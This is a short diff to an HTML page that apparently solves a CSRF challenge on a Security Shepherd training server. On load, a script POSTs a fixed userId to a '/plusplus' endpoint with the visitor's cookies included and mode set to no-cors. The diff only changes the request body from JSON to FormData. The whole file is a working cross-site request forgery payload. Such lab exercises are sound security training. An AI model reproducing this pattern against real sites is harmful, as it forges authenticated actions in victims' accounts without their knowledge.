--- a/csrf.html
+++ b/csrf.html
@@ -1,17 +1,18 @@
 <html><head>
-    <script>
-        fetch('https://security-shepherd.dev.inf.elasticnet.co/user/csrfchallengetwo/plusplus', {
-            method: 'POST',
-            credentials: "include",
-            mode: "no-cors",
-            body: JSON.stringify({
-                "userId": "8a1a261afaa67332ec17bdf95870e76c497c28a0"
-            })
-        })
-    </script>
-  </head>
-  <body>
-       <h1 align="center">kayacool</h1>
-  
+<script>
+    var formData = new FormData();
+    formData.append("userId", "8a1a261afaa67332ec17bdf95870e76c497c28a0");
+
+    fetch('https://security-shepherd.dev.inf.elasticnet.co/user/csrfchallengetwo/plusplus', {
+      method: 'POST',
+      credentials: "include",
+      mode: "no-cors",
+      body: formData
+    })
+  </script>
+</head>
+<body>
+   kayacool
+
 
 </body></html>
